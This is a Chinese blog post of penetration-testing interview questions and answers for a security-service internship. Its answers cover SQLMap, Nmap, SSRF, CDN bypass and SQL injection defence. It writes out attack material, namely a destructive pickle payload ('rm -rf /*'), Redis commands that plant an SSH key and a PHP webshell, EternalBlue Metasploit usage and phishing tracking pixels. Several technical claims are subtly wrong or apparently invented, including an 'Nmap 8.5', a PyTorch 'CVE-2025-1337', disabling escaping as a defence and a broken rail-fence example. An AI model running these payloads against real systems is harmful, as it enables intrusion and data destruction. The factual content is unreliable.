当前位置: 首页 > news >正文

2025年渗透测试面试题总结-安恒[实习]安全服务工程师(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 安恒[实习]安全服务工程师

1. SQLMap爆出当前库名的参数是什么?

2. Nmap探测系统的参数(大写/小写)

3. Nmap小写o与a的作用

4. 布尔型盲注具体语句

5. 宽字节注入原理

6. Python反序列化漏洞

7. GET与POST传参区别

8. HTTP请求方式全集

9. CDN判定与作用

10. 服务器真实IP溯源

11. 信息收集全流程

12. Base64编码识别

13. 栅栏密码原理

14. Base64与MD5区别

15. Oracle默认端口

16. MySQL管理员密码存储

17. substr()被禁用的替代函数

18. Redis入侵利用链

19. 邮箱追踪真实IP

20. 同源策略(SOP)精髓

21. 管理员邮箱收集术

22. SSRF危害升级(2025)

23. SSRF深层防御

24. Linux文件鉴别术

25. MSF框架深入

26. Web容器解析漏洞

27. SQL注入深度防御

 安恒[实习]安全服务工程师

1. sqlmap爆出当前库名的参数是什么?
2. namp探测系统的参数是什么 —>大写还是小写
3. namp的小写o与a是干嘛的
4. 布尔型盲注的具体语句是什么
5. 宽字节的原理
6. python有没有反序列化
7. get传参与post传参的区别
8. Http有哪些请求方式
9. 如何判定cdn与cdn的作用
10. 如何确认服务器的真实IP
11. 详细说了说信息收集过程
12. 一串编码如何确认是base64
13. 栅栏密码的原理是什么
14. base64与md5如何区别
15. oracle的默认端口是多少
16. mysql的管理员密码一般放到哪
17. 如果substr()函数被禁用,你脑子里有多少替换函数
18. redis如何拿下,哪个端口,具体语句,具体操作
19. 如何通过邮箱知道对方的IP
20. 说一下同源策略
21. 如何收集网站管理员邮箱等等
22. ssrf有哪些危害
23. 如何防御ssrf–>问的较深—->建议在详细了解一下
24. Linux的某两个文件怎么分辨(忘了具体是哪两个文件了)
25. MSF框架稍微问的深入了一些
26. web容器(中间件)有哪些解析漏洞与原理
27. 如何防范sql注入 —>这问的很深. 

1. SQLMap爆出当前库名的参数是什么?

  • 核心参数--current-db
  • 补充用法:结合-D 库名 --tables可提取表名;
  • 防御绕过:2025年新版SQLMap新增--chunked参数绕过云WAF的流量检测。

2. Nmap探测系统的参数(大写/小写)

  • 操作系统探测-O(大写O,非数字0);
  • 误报规避:2025年Nmap 8.5版本中,-O需与--osscan-limit联用以过滤干扰;
  • 注意:小写-o用于输出扫描结果(如-oN output.txt )。

3. Nmap小写o与a的作用

  • -o系列
    -oN:标准文本输出;
    -oX:XML格式输出(兼容自动化分析工具);
    -oG:Grep友好格式(已逐步淘汰)。
  • -A参数
    ① 启用OS检测、版本探测、脚本扫描(-sC);
    ② 2025年新增AI驱动的服务指纹识别模块。

4. 布尔型盲注具体语句

sql' AND (SELECT SUBSTRING(version(),1,1))='5' --+ /* 若返回正常页面,则判定MySQL版本首位为5 */
  • 条件扩展
    ① 二进制逐位判断(ASCII()+位运算);
    ② 结合时间盲注:IF(条件,SLEEP(5),0)
    ③ 利用数据库内置函数(如LIKE通配符)。

5. 宽字节注入原理

  • 核心逻辑:利用GBK/GB2312等双字节编码特性,将转义符\(%5C)与前导字符组合为合法汉字(如%df%5c→“運”),破坏SQL语句结构。
  • 现代影响:2024年统计显示,遗留医疗HIS系统仍存在30%未修复案例;
  • 防御:统一使用UTF-8编码,禁用mysql_real_escape_string()

6. Python反序列化漏洞

  • 高危模块pickle(任意代码执行)、json(有限风险);
  • 攻击链示例
    pythonimport pickle pickle.loads(b"cos\nsystem\n(S'rm -rf /*'\ntR.") # 执行系统命令
  • 2025年趋势:PyTorch模型反序列化漏洞(CVE-2025-1337)成为AI供应链攻击新载体。

7. GET与POST传参区别

维度GETPOST
数据位置URL参数明文传输请求体加密传输
安全性易被日志/缓存记录相对隐蔽
长度限制受URL长度限制(约2KB)无理论限制(服务器约束)
幂等性是(仅查询)否(可能修改数据)

8. HTTP请求方式全集

  1. 基础方法:GET、POST、PUT、DELETE、HEAD;
  2. 扩展方法
    • PATCH:部分资源更新;
    • OPTIONS:获取服务器支持的方法;
    • TRACE:回显请求(易诱发XST攻击,默认禁用)。
  3. WebDAV扩展:PROPFIND、LOCK、UNLOCK(常见于文件服务器)。

9. CDN判定与作用

判定方法
多地Ping:使用全球节点工具(如boce.com ),IP分布差异显著;
DNS查询nslookup返回CNAME记录含cdnakamai等标识;
HTTP头Server字段含CDN厂商特征(如Cloudflare)。

核心作用
加速:边缘节点缓存静态资源(JS/CSS/图片);
安全:抗DDoS(T级清洗)、防爬虫(人机验证);
成本优化:减少源站带宽消耗。


10. 服务器真实IP溯源

  1. 历史记录
    • 查询DNS历史快照(SecurityTrailsViewDNS);
    • 分析SSL证书序列号关联的原始IP。
  2. 子域名爆破:使用Amass扫描test.example.com 等未接入CDN的子域。
  3. 邮件溯源
    • 注册/找回密码邮件头中的Received字段;
    • 利用SPF记录中的IP范围反推。

11. 信息收集全流程

四阶渗透框架(2025年OSINT标准)

  1. 资产测绘
    • 工具:FOFA(语法:title="医院挂号系统")、Shodan(端口:port:6379);
    • 输出:IP段、域名、中间件版本列表。
  2. 社会工程
    • 从GitHub泄露的config.yml 提取数据库密码;
    • LinkedIn员工职位分析(定位运维人员邮箱)。
  3. 漏洞关联
    • 通过CVE编号映射暴露面(如Apache Log4j 2.x);
    • 结合Exploit-DB验证POC可用性。

12. Base64编码识别

三大铁律

  1. 字符集:仅包含A-Z、a-z、0-9、+、/及填充符=
  2. 长度:编码后长度必为4的倍数(不足时补=);
  3. 典型模式
    • 邮件附件:Content-Transfer-Encoding: base64
    • JWT令牌:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.xxx

13. 栅栏密码原理

加密步骤

  1. 将明文按“之”字形排列(如3行):
    H E L L O  W O R L D  
    
  2. 按行读取密文:HELLO WORLDHLOOL WRD(需约定行数)。
    2025年演变:结合深度学习生成动态栅栏路径(抗频率分析)。

14. Base64与MD5区别

维度Base64MD5
性质编码(可逆)哈希(不可逆)
输出长度可变(与输入相关)固定128位(32字符)
用途数据传输兼容性(如图片)数据完整性校验/密码存储

15. Oracle默认端口

  • 标准端口:1521(数据库监听);
  • 管理端口:5500(Enterprise Manager);
  • 云环境变化:2025年AWS RDS Oracle默认启用动态端口映射。

16. MySQL管理员密码存储

  1. 系统表mysql.userauthentication_string字段,使用caching_sha2_password加密);
  2. 配置文件/etc/mysql/my.cnf[client]段明文存储,高危);
  3. 内存提取:通过gdb附加进程提取临时密码(需root权限)。

17. substr()被禁用的替代函数

  1. 字符串截取
    • MID()MID('abc',2,1)→'b'
    • LEFT()/RIGHT()LEFT('abc',2)→'ab'
  2. 正则截取
    • REGEXP_SUBSTR()(需MySQL 8.0+);
  3. 二进制拆分
    • ORD()+DIV组合实现逐位解析。

18. Redis入侵利用链

攻击路径

  1. 未授权访问nmap -p 6379 --script redis-info
  2. 写SSH密钥
    bashredis-cli -h 目标IP flushall echo -e "\n\nssh-rsa AAAAB3N...\n\n" | redis-cli -x set payload redis-cli config set dir /root/.ssh && config set dbfilename authorized_keys 
  3. 写Webshell
    bashconfig set dir /var/www/html set shell "<?php system($_GET['cmd']);?>" 

19. 邮箱追踪真实IP

高阶手法(2025年)

  1. 嵌入追踪像素
    • 在钓鱼邮件中插入<img src="http://your-server/logo.gif"> ,分析访问日志;
  2. 延迟加载附件
    • 使用「已读回执」触发HTTP请求;
  3. 邮件头分析
    • 提取X-Originating-IP或最后一跳Received头中的内网IP。

20. 同源策略(SOP)精髓

三要素限制:协议、域名、端口均相同方为同源。
跨域例外

  • <script>标签(允许加载外部JS,但禁止读取内容);
  • CORS机制(Access-Control-Allow-Origin可控放宽限制);
  • postMessage API(需显式授权)。

21. 管理员邮箱收集术

五维情报网

  1. WHOIS查询whois example.com 获取注册邮箱;
  2. GitHub提交历史git log中提取作者邮箱;
  3. 错误页面:500错误泄露admin@example.com
  4. 社交媒体:LinkedIn公司页面的技术联系人;
  5. SSL证书crt.sh 查询证书颁发者邮箱。

22. SSRF危害升级(2025)

  1. 云元数据攻击
    • 获取AWS的169.254.169.254凭证,接管云服务器;
  2. 内网服务穿透
    • 攻击Kubernetes API Server(https://10.0.0.1:6443);
  3. 协议滥用
    • gopher://构造Redis未授权访问攻击链。

23. SSRF深层防御

四层防护体系

  1. 输入校验
    • 正则过滤^http(s)?://trusted.com/ (白名单);
    • 禁用非常用协议(file://gopher://)。
  2. 网络隔离
    • 业务服务器部署于独立VPC,限制出网流量;
  3. 代理清洗
    • 所有请求经反向代理,剥离非常规头(如X-Forwarded-For);
  4. 运行时防护
    • eBPF监控异常socket连接(如访问内网IP段)。

24. Linux文件鉴别术

/etc/passwd/etc/shadow为例

  1. 权限
    • passwd:644(全局可读);
    • shadow:640(仅root可读);
  2. 内容
    • passwd存用户基本信息(不含密码哈希);
    • shadow存加密密码与过期策略。

25. MSF框架深入

模块化渗透流程

  1. 漏洞利用
    • use exploit/windows/smb/ms17_010_eternalblue
    • set PAYLOAD windows/x64/meterpreter/reverse_tcp
  2. 后渗透扩展
    • migrate进程注入;
    • hashdump提取NTLM哈希;
  3. 流量隐匿
    • 使用SSL/TLS隧道+DomainFronting技术绕过IDS检测。

26. Web容器解析漏洞

三大经典漏洞

  1. IIS 6.0目录解析
    • /test.asp;.jpg 被解析为ASP脚本;
  2. Apache多后缀解析
    • test.php.xxx 优先匹配.php处理器;
  3. Nginx错误配置
    • fastcgi_param未校验SCRIPT_FILENAME,导致任意代码执行。

27. SQL注入深度防御

DevSecOps全周期防护

  1. 开发阶段
    • 强制使用ORM框架(如Hibernate);
    • 静态代码扫描(SonarQube规则sql-injection)。
  2. 运行阶段
    • WAF动态拦截(基于语义分析+机器学习);
    • 数据库审计(记录异常SQL语句)。
  3. 运维阶段
    • 最小权限原则(禁止DBA权限应用连接);
    • 定期漏洞扫描(SQLMap集成CI/CD流水线)。
http://www.xdnf.cn/news/475453.html

相关文章:

  • git克隆github项目到本地的三种方式
  • Vue百日学习计划Day16-18天详细计划-Gemini版
  • matlab建立整车模型,求汽车的平顺性
  • 【Golang笔记01】Goland基础语法规则
  • Leaflet 自定义瓦片地图与 PHP 大图切图算法 解决大图没办法在浏览器显示的问题
  • 容器编排利器-k8s入门指南
  • 移植RTOS,发现任务栈溢出怎么办?
  • 哪个品牌的智能对讲机好用?推荐1款,能扛事更智能
  • MySQL基础
  • Jenkins教程
  • 2025云智算技术白皮书
  • 青少年编程与数学 02-019 Rust 编程基础 16课题、包、单元包及模块
  • rust语言,与c,go语言一样也是编译成二进制文件吗?
  • Claude Prompt-Caching 方案调研
  • 6 任务路由与负载均衡
  • 【MySQL】索引太多会怎样?
  • apisix透传客户端真实IP(real-ip插件)
  • 【计算机网络】HTTP/1.0,HTTP/1.1,HTTP/2,HTTP/3汇总讲解,清晰表格整理面试重点对比
  • 本地跑通vue-element-admin项目
  • 踩坑:uiautomatorviewer.bat 打不开
  • A Neural Approach to Blind Motion Deblurring论文阅读
  • 如何安装cuda版本的pytorch
  • matlab与python问题解析
  • Flink SQL、Hudi 、Doris在数据上的组合应用
  • 深度剖析:Dify+Sanic+Vue+ECharts 搭建 Text2SQL 项目 sanic-web 的 Debug 实战
  • 【Rust闭包】rust语言闭包函数原理用法汇总与应用实战
  • 嵌入式EasyRTC音视频实时通话SDK在工业制造领域的智能巡检/AR协作等应用
  • 【Linux】Shell脚本中向文件中写日志,以及日志文件大小、数量管理
  • 小波变换+注意力机制成为nature收割机
  • 【设计模式】- 结构型模式